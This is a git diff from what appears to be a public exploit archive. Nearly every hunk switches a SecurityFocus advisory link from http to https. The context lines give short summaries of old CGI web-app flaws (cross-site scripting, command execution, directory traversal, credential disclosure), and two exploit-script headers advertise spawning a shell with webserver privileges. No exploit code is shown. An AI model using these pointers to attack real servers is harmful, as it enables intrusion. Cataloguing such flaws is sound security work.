b/exploits/cgi/webapps/21435.txt index 82cefb3d7..4a891f712 100644 --- a/exploits/cgi/webapps/21435.txt +++ b/exploits/cgi/webapps/21435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4670/info +source: https://www.securityfocus.com/bid/4670/info askSam is a database system. An optional component, askSam Web Publisher (versions 1 and 4), is reportedly vulnerable to cross site scripting vulnerability in the as_web.exe (or as_web4.exe) component. This is due to a failure to strip script and HTML when returning error messages that include user input. diff --git a/exploits/cgi/webapps/21460.pl b/exploits/cgi/webapps/21460.pl index af093d0bd..1a6041e9b 100755 --- a/exploits/cgi/webapps/21460.pl +++ b/exploits/cgi/webapps/21460.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4764/info +source: https://www.securityfocus.com/bid/4764/info CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick. diff --git a/exploits/cgi/webapps/21473.txt b/exploits/cgi/webapps/21473.txt index 57059b3e7..253f89642 100644 --- a/exploits/cgi/webapps/21473.txt +++ b/exploits/cgi/webapps/21473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4818/info +source: https://www.securityfocus.com/bid/4818/info ViewCVS does not filter HTML tags from certain URL parameters, making it prone to cross-site scripting attacks. diff --git a/exploits/cgi/webapps/21480.txt b/exploits/cgi/webapps/21480.txt index 78b1786ec..d761f227d 100644 --- a/exploits/cgi/webapps/21480.txt +++ b/exploits/cgi/webapps/21480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4825/info +source: https://www.securityfocus.com/bid/4825/info GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. diff --git a/exploits/cgi/webapps/21487.pl b/exploits/cgi/webapps/21487.pl index b3b3fdf4f..e1ced1f12 100755 --- a/exploits/cgi/webapps/21487.pl +++ b/exploits/cgi/webapps/21487.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4870/info +source: https://www.securityfocus.com/bid/4870/info IDS (Image Display System) is an web based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner. diff --git a/exploits/cgi/webapps/21494.txt b/exploits/cgi/webapps/21494.txt index 5461ab9f2..02c105746 100644 --- a/exploits/cgi/webapps/21494.txt +++ b/exploits/cgi/webapps/21494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4887/info +source: https://www.securityfocus.com/bid/4887/info CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick. diff --git a/exploits/cgi/webapps/21495.txt b/exploits/cgi/webapps/21495.txt index 8cb47e285..07946ed22 100644 --- a/exploits/cgi/webapps/21495.txt +++ b/exploits/cgi/webapps/21495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4888/info +source: https://www.securityfocus.com/bid/4888/info CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick. diff --git a/exploits/cgi/webapps/21532.txt b/exploits/cgi/webapps/21532.txt index d272e0d54..1f8439020 100644 --- a/exploits/cgi/webapps/21532.txt +++ b/exploits/cgi/webapps/21532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4993/info +source: https://www.securityfocus.com/bid/4993/info csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21533.txt b/exploits/cgi/webapps/21533.txt index 42743fda9..61445994c 100644 --- a/exploits/cgi/webapps/21533.txt +++ b/exploits/cgi/webapps/21533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4994/info +source: https://www.securityfocus.com/bid/4994/info csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21535.txt b/exploits/cgi/webapps/21535.txt index 2bd91c26a..97022459b 100644 --- a/exploits/cgi/webapps/21535.txt +++ b/exploits/cgi/webapps/21535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4996/info +source: https://www.securityfocus.com/bid/4996/info The MakeBook guestbook software does not sufficiently sanitize potentially dangerous characters from form field input. This may enable attackers to inject arbitrary HTML into form fields, which will be stored on guestbook pages. Additionally, it has been demonstrated that SSI (Server-Side Includes) may also be injected in this manner, and may be executed depending on the underlying environment. diff --git a/exploits/cgi/webapps/21553.txt b/exploits/cgi/webapps/21553.txt index c6424c509..a3813c473 100644 --- a/exploits/cgi/webapps/21553.txt +++ b/exploits/cgi/webapps/21553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5023/info +source: https://www.securityfocus.com/bid/5023/info NetAuction does not filter HTML code from URI parameters, making it prone to cross-site scripting attacks. Attacker-supplied HTML code may be included in a malicious links. The attacker-supplied HTML code will be executed in the browser of a web user who visits this link, in the security context of the host running NetAuction. Such a link might be included in a HTML e-mail or on a malicious webpage. diff --git a/exploits/cgi/webapps/21558.txt b/exploits/cgi/webapps/21558.txt index 4a8748551..11da53ec1 100644 --- a/exploits/cgi/webapps/21558.txt +++ b/exploits/cgi/webapps/21558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5029/info +source: https://www.securityfocus.com/bid/5029/info My Postcards is a commercial available eletronic postcard system. It is available for Unix and Linux Operating Systems. diff --git a/exploits/cgi/webapps/21567.pl b/exploits/cgi/webapps/21567.pl index 645eca086..d5536b9ee 100755 --- a/exploits/cgi/webapps/21567.pl +++ b/exploits/cgi/webapps/21567.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5048/info +source: https://www.securityfocus.com/bid/5048/info WebBBS does not sufficiently filter shell metacharacters from CGI parameters. As a result, remote attackers may execute arbitrary commands on the underlying shell of the system hosting the vulnerable software. diff --git a/exploits/cgi/webapps/21573.txt b/exploits/cgi/webapps/21573.txt index 933bc4888..a3a9640ba 100644 --- a/exploits/cgi/webapps/21573.txt +++ b/exploits/cgi/webapps/21573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5078/info +source: https://www.securityfocus.com/bid/5078/info It is reported possible for attackers to construct a URL that will cause scripting code to be embedded in error pages. diff --git a/exploits/cgi/webapps/21587.txt b/exploits/cgi/webapps/21587.txt index 8142dbd3d..f3c16d251 100644 --- a/exploits/cgi/webapps/21587.txt +++ b/exploits/cgi/webapps/21587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5135/info +source: https://www.securityfocus.com/bid/5135/info Betsie (BBC Education Text to Speech Internet Enhancer) is prone to a cross-site scripting vulnerability. This issue exists in the parserl.pl script. diff --git a/exploits/cgi/webapps/21588.txt b/exploits/cgi/webapps/21588.txt index 2abb39bda..43a64d1bc 100644 --- a/exploits/cgi/webapps/21588.txt +++ b/exploits/cgi/webapps/21588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5137/info +source: https://www.securityfocus.com/bid/5137/info Blackboard is reportedly prone to cross-site scripting attacks. This issue was reported to be in the login.pl script. The vulnerable script fails to sanitize HTML tags from CGI parameters. diff --git a/exploits/cgi/webapps/21609.txt b/exploits/cgi/webapps/21609.txt index 9f5ba5046..0d68c75d9 100644 --- a/exploits/cgi/webapps/21609.txt +++ b/exploits/cgi/webapps/21609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5199/info +source: https://www.securityfocus.com/bid/5199/info Fluid Dynamics Search Engine is a search application for local and remote web sites, and is designed to work in most UNIX and Microsoft Windows environments. Fluid Dynamics Search Engine and is maintained by Zoltan Milosevic. diff --git a/exploits/cgi/webapps/21617.txt b/exploits/cgi/webapps/21617.txt index 532f85fd8..23c4a8ec9 100644 --- a/exploits/cgi/webapps/21617.txt +++ b/exploits/cgi/webapps/21617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5238/info +source: https://www.securityfocus.com/bid/5238/info A vulnerability has been reported in the IMHO Roxen webmail module which may enable a malicious user of the webmail system to gain access to the account of another user. This issue is due to an error in configuration which may leak the REFERER for a session with the webmail system, which an attacker may use to access another webmail account. diff --git a/exploits/cgi/webapps/21658.html b/exploits/cgi/webapps/21658.html index db7ad2137..704385b01 100644 --- a/exploits/cgi/webapps/21658.html +++ b/exploits/cgi/webapps/21658.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5340/info +source: https://www.securityfocus.com/bid/5340/info The vulnerability has been reported for Easy Homepage Creator. It is possible for an atttacker to modify any user's home page. The vulnerability is the result of Homepage Creator failing to properly authenticate users who wish to edit home pages. diff --git a/exploits/cgi/webapps/21659.html b/exploits/cgi/webapps/21659.html index 893f9ac18..7cf848137 100644 --- a/exploits/cgi/webapps/21659.html +++ b/exploits/cgi/webapps/21659.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5341/info +source: https://www.securityfocus.com/bid/5341/info The vulnerability has been reported for Easy Guestbook 1.0. It is possible for an atttacker to modify any user's guestbook by deleting entries. The vulnerability is the result of Guestbook failing to properly authenticate users who wish to edit guestbooks. diff --git a/exploits/cgi/webapps/21679.txt b/exploits/cgi/webapps/21679.txt index 39f0f5999..805ffe3a1 100644 --- a/exploits/cgi/webapps/21679.txt +++ b/exploits/cgi/webapps/21679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5392/info +source: https://www.securityfocus.com/bid/5392/info Dispair fails to sufficiently validate user-supplied input before it is passed to the shell via the Perl open() function. Remote attackers may potentially exploit this issue to execute arbitrary commands on the underlying shell with the privileges of the webserver process. diff --git a/exploits/cgi/webapps/21728.txt b/exploits/cgi/webapps/21728.txt index e9787c24c..66acb614b 100644 --- a/exploits/cgi/webapps/21728.txt +++ b/exploits/cgi/webapps/21728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5507/info +source: https://www.securityfocus.com/bid/5507/info Reportedly, Kerio Mailserver is vulnerable to cross site scripting attacks. The vulnerability is present in Kerio Mailserver's web mail component. diff --git a/exploits/cgi/webapps/21729.txt b/exploits/cgi/webapps/21729.txt index c006cbd57..05728fb1f 100644 --- a/exploits/cgi/webapps/21729.txt +++ b/exploits/cgi/webapps/21729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5516/info +source: https://www.securityfocus.com/bid/5516/info Multiple cross site scripting vulnerabilities have been reported for the Bonsai tool. diff --git a/exploits/cgi/webapps/21730.txt b/exploits/cgi/webapps/21730.txt index 62e1db459..70685a782 100644 --- a/exploits/cgi/webapps/21730.txt +++ b/exploits/cgi/webapps/21730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5517/info +source: https://www.securityfocus.com/bid/5517/info A path disclosure vulnerability has been reported in Mozilla Bonsai. diff --git a/exploits/cgi/webapps/21768.txt b/exploits/cgi/webapps/21768.txt index 020a229f8..ee59c60aa 100644 --- a/exploits/cgi/webapps/21768.txt +++ b/exploits/cgi/webapps/21768.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5605/info +source: https://www.securityfocus.com/bid/5605/info Super Site Searcher is prone to remote command execution. Shell metacharacters are not adequately filtered from query string parameters in a request to the vulnerable search engine script. The parameters are then used in a function which passes commands directly through the shell. diff --git a/exploits/cgi/webapps/21769.txt b/exploits/cgi/webapps/21769.txt index f49864e52..d93ecf8b9 100644 --- a/exploits/cgi/webapps/21769.txt +++ b/exploits/cgi/webapps/21769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5618/info +source: https://www.securityfocus.com/bid/5618/info Aestiva HTML/OS is a database engine and development suite for building websites and web-based software products. diff --git a/exploits/cgi/webapps/21802.txt b/exploits/cgi/webapps/21802.txt index ad8e06d79..8d57afda2 100644 --- a/exploits/cgi/webapps/21802.txt +++ b/exploits/cgi/webapps/21802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5728/info +source: https://www.securityfocus.com/bid/5728/info Lycos htmlGEAR guestGEAR does not sanitize HTML from CSS (Cascading Style-Sheets) elements in guestbook fields. An attacker could capitalize on this situation to include arbitrary HTML and script code in a guestbook entries, which would be rendered in the web client of users who view the malicious guestbook entry. diff --git a/exploits/cgi/webapps/21877.txt b/exploits/cgi/webapps/21877.txt index cdb54f155..7c7485f8b 100644 --- a/exploits/cgi/webapps/21877.txt +++ b/exploits/cgi/webapps/21877.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5823/info +source: https://www.securityfocus.com/bid/5823/info Emumail is an open source web mail application. It is available for the Unix, Linux, and Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21878.txt b/exploits/cgi/webapps/21878.txt index 0c1f25821..7d3849e83 100644 --- a/exploits/cgi/webapps/21878.txt +++ b/exploits/cgi/webapps/21878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5824/info +source: https://www.securityfocus.com/bid/5824/info Emumail is an open source web mail application. It is available for the Unix, Linux, and Microsoft Windows operating systems. diff --git a/exploits/cgi/webapps/21895.txt b/exploits/cgi/webapps/21895.txt index 072be019e..3307d931e 100644 --- a/exploits/cgi/webapps/21895.txt +++ b/exploits/cgi/webapps/21895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5852/info +source: https://www.securityfocus.com/bid/5852/info A flaw in the CGIServlet in Jetty allows an attacker to execute arbitrary commands on the server. Specifically, it is possible for an attacker to use directory traversal sequences and cause the CGIServlet to execute attacker-specified commands (such as running executables on the host). diff --git a/exploits/cgi/webapps/21926.txt b/exploits/cgi/webapps/21926.txt index 95986d90e..cad76b7f1 100644 --- a/exploits/cgi/webapps/21926.txt +++ b/exploits/cgi/webapps/21926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5932/info +source: https://www.securityfocus.com/bid/5932/info Authoria HR Suite is prone to cross-site scripting attacks. diff --git a/exploits/cgi/webapps/21962.txt b/exploits/cgi/webapps/21962.txt index a9e86ee4c..30cb07aa3 100644 --- a/exploits/cgi/webapps/21962.txt +++ b/exploits/cgi/webapps/21962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6040/info +source: https://www.securityfocus.com/bid/6040/info Mojo Mail does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. diff --git a/exploits/cgi/webapps/21966.txt b/exploits/cgi/webapps/21966.txt index 177dea041..672caba5c 100644 --- a/exploits/cgi/webapps/21966.txt +++ b/exploits/cgi/webapps/21966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6055/info +source: https://www.securityfocus.com/bid/6055/info A vulnerability exists in Mailreader.com which may enable remote attackers to disclose the contents of arbitrary webserver readable files. An attacker may exploit this issue by submitting a malicious web request containing dot-dot-slash (../) directory traversal sequences. The request must be for a known resource, and the file request must be appended by a null byte (%00). diff --git a/exploits/cgi/webapps/21979.txt b/exploits/cgi/webapps/21979.txt index 67705b8ab..c256a1748 100644 --- a/exploits/cgi/webapps/21979.txt +++ b/exploits/cgi/webapps/21979.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6091/info +source: https://www.securityfocus.com/bid/6091/info A vulnerability has been discovered in ION Script. diff --git a/exploits/cgi/webapps/21995.txt b/exploits/cgi/webapps/21995.txt index 30a33a84d..81fdffafa 100644 --- a/exploits/cgi/webapps/21995.txt +++ b/exploits/cgi/webapps/21995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6127/info +source: https://www.securityfocus.com/bid/6127/info It has been reported that the default configuration of CuteCast is insecure. According to the report, CuteCast stores user information in a publicly accessible directory. This includes plaintext credentials. diff --git a/exploits/cgi/webapps/22015.txt b/exploits/cgi/webapps/22015.txt index 206fa7691..99054c7c4 100644 --- a/exploits/cgi/webapps/22015.txt +++ b/exploits/cgi/webapps/22015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6170/info +source: https://www.securityfocus.com/bid/6170/info Versions of W3Mail 1.0.6 and greater are susceptible to a file disclosure vulnerability. To view attachments, the script "viewAttachment.cgi" accepts the parameter "file". The value of this parameter is passed to the open() function as the filename argument without being sanitized. Attackers may cause any file on the filesystem to open by specifying its relative path using directory traversal characters. diff --git a/exploits/cgi/webapps/22045.txt b/exploits/cgi/webapps/22045.txt index cb65838fa..30cbcfffe 100644 --- a/exploits/cgi/webapps/22045.txt +++ b/exploits/cgi/webapps/22045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6253/info +source: https://www.securityfocus.com/bid/6253/info The ext.dll ISAPI does not sufficiently sanitize user-supplied input when processing search queries. This may allow an attacker to create a custom URL containing script code that, when viewed in a browser by a legitimate user, will result in the execution of the script code. diff --git a/exploits/cgi/webapps/22050.txt b/exploits/cgi/webapps/22050.txt index c766abe4a..50271b1b7 100644 --- a/exploits/cgi/webapps/22050.txt +++ b/exploits/cgi/webapps/22050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6265/info +source: https://www.securityfocus.com/bid/6265/info Reportedly, ImageFolio is prone to cross site scripting attacks due to insufficient sanitization of user-supplied input. The vulnerability exists in various cgi scripts included with ImageFolio. diff --git a/exploits/cgi/webapps/22051.txt b/exploits/cgi/webapps/22051.txt index 7b5edeecc..6e65db29c 100644 --- a/exploits/cgi/webapps/22051.txt +++ b/exploits/cgi/webapps/22051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6265/info +source: https://www.securityfocus.com/bid/6265/info Reportedly, ImageFolio is prone to cross site scripting attacks due to insufficient sanitization of user-supplied input. The vulnerability exists in various cgi scripts included with ImageFolio. diff --git a/exploits/cgi/webapps/22052.txt b/exploits/cgi/webapps/22052.txt index d6512d9f9..83bf12802 100644 --- a/exploits/cgi/webapps/22052.txt +++ b/exploits/cgi/webapps/22052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6272/info +source: https://www.securityfocus.com/bid/6272/info A cross-site scripting vulnerability has been reported in the YaBB forum. This vulnerability is due to insufficient sanitization of URI parameters in some scripts. diff --git a/exploits/cgi/webapps/22111.pl b/exploits/cgi/webapps/22111.pl index c3b9ac029..11d0261da 100755 --- a/exploits/cgi/webapps/22111.pl +++ b/exploits/cgi/webapps/22111.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6472/info +source: https://www.securityfocus.com/bid/6472/info CHETCPASSWD is prone to a vulnerability that may potentially cause the tail end of the local shadow file to be disclosed to a remote attacker. diff --git a/exploits/cgi/webapps/22137.txt b/exploits/cgi/webapps/22137.txt index 9c96ee912..ff101d998 100644 --- a/exploits/cgi/webapps/22137.txt +++ b/exploits/cgi/webapps/22137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6570/info +source: https://www.securityfocus.com/bid/6570/info FormMail-clone is allegedly prone to cross-site scripting attacks. diff --git a/exploits/cgi/webapps/22169.pl b/exploits/cgi/webapps/22169.pl index 9f3d119b0..87eb2f31a 100755 --- a/exploits/cgi/webapps/22169.pl +++ b/exploits/cgi/webapps/22169.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6607/info +source: https://www.securityfocus.com/bid/6607/info Psunami Bulletin Board is prone to a remote command execution vulnerability. diff --git a/exploits/cgi/webapps/22170.pl b/exploits/cgi/webapps/22170.pl index 66ff08f8a..d5216a6cf 100755 --- a/exploits/cgi/webapps/22170.pl +++ b/exploits/cgi/webapps/22170.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6607/info +source: https://www.securityfocus.com/bid/6607/info Psunami Bulletin Board is prone to a remote command execution vulnerability. @@ -7,7 +7,7 @@ Psunami does not sufficiently sanitize shell metacharacters from query string pa ##################################################### # Shopcart exploit # Spawn bash style Shell with webserver uid -# http://www.securityfocus.com/bid/6607 +# https://www.securityfocus.com/bid/6607 # Spabam 2003 PRIV8 code # #hackarena irc.brasnet.org # This Script is currently under development diff --git a/exploits/cgi/webapps/22198.txt b/exploits/cgi/webapps/22198.txt index b3d6890dd..26f4084d7 100644 --- a/exploits/cgi/webapps/22198.txt +++ b/exploits/cgi/webapps/22198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6677/info +source: https://www.securityfocus.com/bid/6677/info A vulnerability has been discovered in GNU Mailman. It has been reported that Mailman is prone to cross site scripting attacks. This is due to insufficient santization of URI parameters. diff --git a/exploits/cgi/webapps/22199.txt b/exploits/cgi/webapps/22199.txt index 4951ff32d..8f6f712a5 100644 --- a/exploits/cgi/webapps/22199.txt +++ b/exploits/cgi/webapps/22199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6678/info +source: https://www.securityfocus.com/bid/6678/info A vulnerability has been discovered in GNU Mailman. The issue occurs to insufficient sanitization of user-supplied data which is output when generating error pages. diff --git a/exploits/cgi/webapps/22204.txt b/exploits/cgi/webapps/22204.txt index 6fa68ab07..c19d2ce73 100644 --- a/exploits/cgi/webapps/22204.txt +++ b/exploits/cgi/webapps/22204.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6711/info +source: https://www.securityfocus.com/bid/6711/info MultiHTML is prone to a file disclosure vulnerability. diff --git a/exploits/cgi/webapps/22227.txt b/exploits/cgi/webapps/22227.txt index d3bbb0197..a7068f4f7 100644 --- a/exploits/cgi/webapps/22227.txt +++ b/exploits/cgi/webapps/22227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6783/info +source: https://www.securityfocus.com/bid/6783/info FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley & Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server. diff --git a/exploits/cgi/webapps/22228.txt b/exploits/cgi/webapps/22228.txt index c85d279b0..846ef97bf 100644 --- a/exploits/cgi/webapps/22228.txt +++ b/exploits/cgi/webapps/22228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6784/info +source: https://www.securityfocus.com/bid/6784/info FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley & Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server. diff --git a/exploits/cgi/webapps/22260.c b/exploits/cgi/webapps/22260.c index 739b6ba36..c5cd352a1 100644 --- a/exploits/cgi/webapps/22260.c +++ b/exploits/cgi/webapps/22260.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6882/info +// source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script. diff --git a/exploits/cgi/webapps/22261.pl b/exploits/cgi/webapps/22261.pl index bc5288e0b..bfebbb779 100755 --- a/exploits/cgi/webapps/22261.pl +++ b/exploits/cgi/webapps/22261.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6882/info +source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script. diff --git a/exploits/cgi/webapps/22262.pl b/exploits/cgi/webapps/22262.pl index cc55bb434..4684c9f1a 100755 --- a/exploits/cgi/webapps/22262.pl +++ b/exploits/cgi/webapps/22262.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6882/info +source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script. diff --git a/exploits/cgi/webapps/22263.pl b/exploits/cgi/webapps/22263.pl index 4cfb3ae89..b20533dd0 100755 --- a/exploits/cgi/webapps/22263.pl +++ b/exploits/cgi/webapps/22263.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6882/info +source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script. diff --git a/exploits/cgi/webapps/22337.txt b/exploits/cgi/webapps/22337.txt index 3e1689b0d..b004e9c5c 100644 --- a/exploits/cgi/webapps/22337.txt +++ b/exploits/cgi/webapps/22337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7043/info +source: https://www.securityfocus.com/bid/7043/info A remote command execution vulnerability has been discovered in the Wordit Logbook application. This issue occurs due to insufficient sanitization of externally supplied data to the 'logbook.pl' script. diff --git a/exploits/cgi/webapps/22364.c b/exploits/cgi/webapps/22364.c index 89e54f791..83420eae2 100644 --- a/exploits/cgi/webapps/22364.c +++ b/exploits/cgi/webapps/22364.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7115/info +// source: https://www.securityfocus.com/bid/7115/info Outblaze web mail service has been reported prone to an authentication cookie spoofing vulnerability. diff --git a/exploits/cgi/webapps/22377.txt b/exploits/cgi/webapps/22377.txt index a1c487a27..ad2faac72 100644 --- a/exploits/cgi/webapps/22377.txt +++ b/exploits/cgi/webapps/22377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7125/info +source: https://www.securityfocus.com/bid/7125/info Kebi Academy 2001 does not sufficiently validate input supplied via URI parameters. As a result it has been reported that it is possible to retrieve arbitrary files which are readable by the web server. It has also been reported that it is possible to upload malicious files to the server. This could result in disclosure of sensitive information or execution of arbitrary commands in the context of the web server. diff --git a/exploits/cgi/webapps/22380.pl b/exploits/cgi/webapps/22380.pl index ed59c0989..7c432702e 100755 --- a/exploits/cgi/webapps/22380.pl +++ b/exploits/cgi/webapps/22380.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7133/info +source: https://www.securityfocus.com/bid/7133/info A vulnerability has been discovered in the Smart Search CGI script. Due to insufficient sanitization of user-supplied URI parameters, it may be possible for an attacker to execute arbitrary commands on a target system. All commands executed in this manner would be run with the privileges of the web server hosting the script. diff --git a/exploits/cgi/webapps/22408.txt b/exploits/cgi/webapps/22408.txt index 84c454259..bdbf2d48c 100644 --- a/exploits/cgi/webapps/22408.txt +++ b/exploits/cgi/webapps/22408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7167/info +source: https://www.securityfocus.com/bid/7167/info A vulnerability has been reported in Planetmoon Guestbook. It has been reported that remote users may be able to retrieve clear text password lists. Access to this data may allow an attacker to carry out further attacks against a target user. diff --git a/exploits/cgi/webapps/22481.txt b/exploits/cgi/webapps/22481.txt index bbd4f0356..d7e2c8b73 100644 --- a/exploits/cgi/webapps/22481.txt +++ b/exploits/cgi/webapps/22481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7319/info +source: https://www.securityfocus.com/bid/7319/info Super Guestbook has been reported prone to a sensitive information disclosure weakness. diff --git a/exploits/cgi/webapps/22482.txt b/exploits/cgi/webapps/22482.txt index 6f846973b..f739d2145 100644 --- a/exploits/cgi/webapps/22482.txt +++ b/exploits/cgi/webapps/22482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7320/info +source: https://www.securityfocus.com/bid/7320/info Guestbook has been reported prone to a sensitive information disclosure weakness. diff --git a/exploits/cgi/webapps/22499.pl b/exploits/cgi/webapps/22499.pl index 0ee523f8d..5273a764f 100755 --- a/exploits/cgi/webapps/22499.pl +++ b/exploits/cgi/webapps/22499.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7361/info +source: https://www.securityfocus.com/bid/7361/info It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data. diff --git a/exploits/cgi/webapps/22500.pl b/exploits/cgi/webapps/22500.pl index 9d72265b7..71e806cf3 100755 --- a/exploits/cgi/webapps/22500.pl +++ b/exploits/cgi/webapps/22500.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7361/info +source: https://www.securityfocus.com/bid/7361/info It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data. diff --git a/exploits/cgi/webapps/22545.pl b/exploits/cgi/webapps/22545.pl index 5af6313a3..62ccbac6c 100755 --- a/exploits/cgi/webapps/22545.pl +++ b/exploits/cgi/webapps/22545.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7444/info +source: https://www.securityfocus.com/bid/7444/info A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used. diff --git a/exploits/cgi/webapps/22559.pl b/exploits/cgi/webapps/22559.pl index d615a62c5..b963dfb3b 100755 --- a/exploits/cgi/webapps/22559.pl +++ b/exploits/cgi/webapps/22559.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7485/info +source: https://www.securityfocus.com/bid/7485/info Stockman Shopping Cart has been reported prone to a remote command execution vulnerability. This issue presents itself in the 'shop.plx' script. @@ -11,7 +11,7 @@ The precise technical details of this vulnerability are currently unknown. This ##################################################### # Stockman Shopping Cart exploit # Spawn bash style Shell with webserver uid -# http://www.securityfocus.com/bid/7485 +# https://www.securityfocus.com/bid/7485 # Spabam 2003 PRIV8 code # #hackarena irc.brasnet.org # This Script is currently under development diff --git a/exploits/cgi/webapps/22571.pl b/exploits/cgi/webapps/22571.pl index b9a66fd6c..2ce8344e9 100755 --- a/exploits/cgi/webapps/22571.pl +++ b/exploits/cgi/webapps/22571.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7529/info +source: https://www.securityfocus.com/bid/7529/info It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the normal_html.cgi script. This could lead to attacks against system resources. diff --git a/exploits/cgi/webapps/22572.pl b/exploits/cgi/webapps/22572.pl index 7dfc542a6..8f05b45a3 100755 --- a/exploits/cgi/webapps/22572.pl +++ b/exploits/cgi/webapps/22572.pl @@ -1,4 +1,4 @@ 